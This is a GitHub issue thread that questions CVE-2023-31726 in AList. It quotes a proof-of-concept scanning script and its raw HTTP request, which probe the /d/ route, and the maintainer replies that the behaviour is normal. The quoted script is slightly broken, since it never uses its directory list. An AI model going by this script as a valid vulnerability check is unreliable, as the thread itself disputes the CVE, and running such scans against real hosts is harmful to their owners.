Does this CVE-2023-31726 exist?

[NoneScriptHere]

Yesterday I noticed this poc for CVE-2023-31726 from this project
https://github.com/J6451/CVE-2023-31726

poc source code here

from loguru import logger
from pocx import AioPoc


class CVE_2023_31726(AioPoc):
    def __init__(self):
        super(CVE_2023_31726, self).__init__()
        self.name = 'AList 3.15.1 is vulnerable to Incorrect Access Control, which can be exploited by attackers to obtain sensitive information.'
        self.cve = 'CVE-2023-31726'
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Aoyou/biEzMm5kNDRrWTcgazFsTEFTYejkYHK-l5UHLC1JPOhy_B1sefJvAsiTZA=='}
        self.timeout = 20

    async def poc(self, target: str):
        target = target.strip("/")
        target_1 = f'{target}/d/'
        try:
            dir_name_list = ["阿里云盘", "Onedrive", "天翼云盘", "123云盘",
                             "百度网盘", "一刻相册", "谷歌云盘", "PikPak",
                             "迅雷云盘", "夸克网盘", "电影", "电视剧",
                             "音乐", "书籍", "游戏", "软件", "简历",
                             "root", "docker", "alist", "download", "local"]
            for dir_name in dir_name_list:
                print(target_1)
                response_1 = await self.aio_get(target_1)
                print(response_1.text)
                if "failed link: not a file" in response_1.text:
                    print(dir_name)
                    return True
        except Exception:
            logger.error(f'[-] {target} is not vulnerable')
        return False


if __name__ == '__main__':
    poc = CVE_2023_31726()
    poc.run("http://example")

It just request

GET /d/ HTTP/1.1
Host: example
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

If HTTP response include failed link: not a file, which means CVE-2023-31726 exist.

But I find the same issue
#3944

According to the official documentation, this is normal rather than vulnerability.
https://alist.nn.ci/zh/config/global.html#%E7%AD%BE%E5%90%8D%E6%89%80%E6%9C%89

So I want to know if CVE-2023-31726 exists.

[xhofe]

No, the /d/*path route will only perform permission verification when the sign is enabled or a password is added, it's normal.

[NoneScriptHere]

Can you write an email to the CVE official to request the cancellation of this vulnerability identification number?

There have already been too many meaningless and erroneous vulnerabilities.

Thanks!